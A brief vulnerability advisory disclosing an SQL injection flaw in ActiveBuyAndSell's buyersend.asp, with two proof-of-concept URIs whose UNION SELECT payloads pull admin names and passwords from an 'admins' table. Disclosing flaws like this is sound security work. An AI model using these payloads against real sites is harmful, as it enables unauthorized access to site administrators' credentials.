ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability

ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins